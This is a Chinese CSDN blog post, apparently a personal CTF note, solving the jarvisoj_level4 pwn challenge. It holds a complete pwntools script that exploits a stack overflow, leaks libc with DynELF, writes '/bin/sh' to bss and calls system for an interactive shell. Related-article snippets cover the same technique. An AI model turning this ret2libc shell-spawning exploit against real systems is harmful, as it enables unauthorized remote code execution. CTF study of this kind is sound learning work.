[DynELF]jarvisoj_level4

最新推荐文章于 2023-09-16 23:52:06 发布
最新推荐文章于 2023-09-16 23:52:06 发布
阅读量104 收藏
点赞数
分类专栏: pwn ctf 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50819561/article/details/120572577
版权
pwn 同时被 2 个专栏收录
10 篇文章 2 订阅
订阅专栏
ctf
10 篇文章 0 订阅
订阅专栏
本文记录了一次远程服务利用过程,通过 DynELF 库获取 libc 的 system 地址,并利用写入和读取系统调用来执行 '/bin/sh',实现远程控制。主要涉及的技术包括 DynELF、ELF 文件解析、内存漏洞利用等。
摘要由CSDN通过智能技术生成

这题没给libc,所以用DynELF。
记录一下仅供自己使用,以免以后忘了他的用法。

from pwn import *
from LibcSearcher import *

r=remote('node4.buuoj.cn','26626')
#r=process('./a')
elf=ELF('./a')
context.log_level = 'debug'
#libc_base = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']

write_plt=elf.plt['write']
read_plt=elf.plt['read']
main=0x08048350
bss_addr=0x0804A024

def leak(addr):
    payload='a' * 0x88 + 'a' * 4 + p32(write_plt) + p32(main) + p32(1) + p32(addr) + p32(4)
    r.sendline(payload)
    leak_addr=r.recv(4)
    return leak_addr

d=DynELF(leak,elf=elf)
sys_addr=d.lookup('system','libc')
payload1='a' * 0x88 + 'a' * 4 + p32(read_plt) + p32(main) + p32(0) + p32(bss_addr) + p32(9)
r.sendline(payload1)
r.sendline('/bin/sh\x00')
payload1='a' * 0x88 + 'a'*4+p32(sys_addr)+p32(0xaaaa)+p32(bss_addr)
r.sendline(payload1)
r.interactive()
永远在深夜里就好了
关注
专栏目录
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 541
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
Jarvis OJ --level4
Kni9hT's Blog
11-11 255
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
JarvisOJ level4
PLpa的博客
07-08 2322
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
[PWN] jarvisoj_level4 DynELF()函数使用总结
LDX的博客
09-16 132
DynELF使用技巧和示例
jarvisoj_level4
个人笔记
04-08 139
思路:ret2libc,泄露_write来获取Libc基址。3,IDA静态查看是否有ret利用点。
jarvisoj_level1-ret2libc
个人笔记
06-13 128
利用的是pwntool模板自动搜索泄露地址匹配的libc版本。思路:无binsh,无system,考虑ret2libc。
BUUCTF pwn——jarvisoj_level4
CNS-Enterprise BCC-1701-J
05-04 276
BUUCTF 做题练习
Jarvis OJ Level4
qq_39153421的博客
09-19 442
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 281
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1159
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
c语言int 0x80,「JarvisOJ」系统调用——int $0x80/syscall[回顾JOJ level4——无.so]
weixin_39786141的博客
05-23 625
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?宏观上说,int $0x80是intel汇编层面的系统调用,而syscall也是系统调用,只不过是linux系统中c语言环境下的系统调用实体。只是层面不同,指的是一个东西。Linux 系统调用(SCI,system call interface)的实现机制实际上是一个多路汇聚以及分解的过程,该汇聚点就是 0x80 中断这...
【demx96】美容美甲类网站手机模板.zip
10-13
【demx96】美容美甲类网站手机模板.zip
【图像去噪】基于matlab小波域双重局部维纳滤波图像去噪(含PSNR)【含Matlab源码 1642期】.md
10-13
【图像去噪】基于matlab小波域双重局部维纳滤波图像去噪(含PSNR)【含Matlab源码 1642期】
【图像去噪】基于matlab自适应双边滤波SAR灰色图像去噪(含PNSR)【含Matlab源码 4232期】.md
10-13
【图像去噪】基于matlab自适应双边滤波SAR灰色图像去噪(含PNSR)【含Matlab源码 4232期】
小波变换遥感影像(高光谱和多波段)融合(含熵值 相关系数 光谱扭曲度 峰值信噪比)【含Matlab源码 4433期】.md
10-13
小波变换遥感影像(高光谱和多波段)融合(含熵值 相关系数 光谱扭曲度 峰值信噪比)【含Matlab源码 4433期】.md
【图像复原】基于matlab维纳滤波图像复原(含PSNR MSE)【含Matlab源码 4519期】.md
10-13
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像修复: 维纳滤波、最小二乘、模糊图像复原、中值、均值图像恢复、全变分TV+curvelet变换图像修复、自适应空间滤波图像修复
【demx184】器材器械企业通用单独手机模板.zip
最新发布
10-13
【demx184】器材器械企业通用单独手机模板.zip
heatmap-2.2.1-cp37-cp37m-win_amd64.whl
10-13
heatmap-2.2.1-cp37-cp37m-win_amd64.whl
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值